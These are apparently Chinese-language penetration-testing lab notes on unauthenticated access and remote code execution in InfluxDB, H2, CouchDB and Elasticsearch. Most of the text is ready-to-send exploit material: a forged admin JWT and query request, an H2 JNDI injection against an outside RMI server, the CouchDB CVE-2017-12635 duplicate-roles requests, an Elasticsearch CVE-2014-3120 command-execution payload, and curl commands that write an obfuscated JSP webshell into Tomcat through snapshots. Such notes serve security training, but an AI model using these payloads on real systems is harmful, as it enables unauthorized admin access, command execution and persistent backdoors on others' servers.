一、Influxdb-未授權通路-Jwt驗證不當
預設端口:8086 8088
influxdb是一款著名的時序資料庫,其使用jwt作為鑒權方式。在使用者開啟了認證,但未設定參數shared-secret的情況下,jwt的認證密鑰為空字元串,此時攻擊者可以僞造任意使用者身份在influxdb中執行SQL語句。
1、借助https://jwt.io/來生成jwt token:
{
"alg": "HS256",
"typ": "JWT"
}
{
"username": "admin",
"exp": 1676346267
}
借助docker搭建環境
通路http://192.168.153.132:8086/debug/vars
![](https://img.laitimes.com/img/__Qf2AjLwojIjJCLyojI0JCLicmbw5SM4gTN3EjM0ADMlhjM1MjNiVTNjNTZjNDMlJzNhFWOi9CX0JXZ252bj91Ztl2Lc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
通過burp抓包,利用json加密,exp="exp": 1676346267,這裡的時間大于目前時間
POST /query HTTP/1.1
Host: 192.168.153.132:8086
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
db=sample&q=show users
二、H2database-未授權通路-配置不當
預設端口:20051
H2 database是一款Java記憶體資料庫,多用于單元測試。H2 database自帶一個Web管理頁面,在Spirng開發中,如果我們設定如下選項,即可允許外部使用者通路Web管理頁面,且沒有鑒權:預設端口:
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
利用這個管理頁面,我們可以進行JNDI注入攻擊,進而在目标環境下執行任意指令。
1、下載下傳JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit
2、生成執行RMI Payload-URL
-C 執行指令 -A 伺服器位址
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 47.94.236.117
3、填入URL送出執行
javax.naming.InitialContext
rmi://47.94.236.117:1099/kd1rns
利用docker搭建靶機,通路http://192.168.153.132:8080/h2-console/login.jsp?jsessionid=f49af99d4d6641c0c9d6573f3fd57c55
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 192.168.153.129
三、CouchDB-權限繞過配合RCE-漏洞
預設端口:5984
Apache CouchDB是一個開源資料庫,專注于易用性和成為"完全擁抱web的資料庫"。它是一個使用JSON作為存儲格式,JavaScript作為查詢語言,MapReduce和HTTP作為API的NoSQL資料庫。應用廣泛,如BBC用在其動态内容展示平台,Credit Suisse用在其内部的商品部門的市場架構,Meebo,用在其社交平台(web和應用程式)
-CouchDB-權限繞過-CVE-2017-12635
1、先建立使用者
Post:/_users/org.couchdb.user:vulhub
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
2、登入使用者授權
Get:/_utils/
vulhub vulhub
第一次發包
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}
第二次發包
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
-CouchDB-權限繞過RCE-CVE-2017-12636
1、下載下傳exp.py
2、修改目标和反彈位址
3、Python3調用執行即可
https://github.com/vulhub/vulhub/blob/master/couchdb/CVE-2017-12636/exp.py
ElasticSearch-檔案寫入&RCE-漏洞
預設端口:9200 9300
-Elasticsearch RCE CVE-2014-3120
1、漏洞需要es中至少存在一條資料,是以我們需要先建立一條資料
POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
"name": "xiaodi"
}
2、直接發包觸發執行指令
POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {
}
}
}
},
"script_fields": {
"command": {
"script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
}
}
}
-Elasticsearch 檔案寫入 wooyun_2015_110216
9200一般為ElasticSearch的常用端口,此漏洞環境需要與中間件使用
1、發現9200端口存在elasticsearch頁面,8080存在tomcat目錄
2、利用ElasticSearch寫入後門到/usr/local/tomcat/webapps/wwwroot/
curl -XPOST http://123.58.236.76:31556/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'
curl -XPUT 'http://123.58.236.76:31556/_snapshot/yz.jsp' -d '{
"type": "fs",
"settings": {
"location": "/usr/local/tomcat/webapps/wwwroot/",
"compress": false
}
}'
curl -XPUT "http://123.58.236.76:31556/_snapshot/yz.jsp/yz.jsp" -d '{
"indices": "yz.jsp",
"ignore_unavailable": "true",
"include_global_state": false
}'
3、通路8080端口snapshot-yz.jsp檔案寫入代碼到test.jsp中
檔案寫入網址:http://123.58.236.76:31557/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success
代碼顯示網址:http://123.58.236.76:31557/wwwroot/test.jsp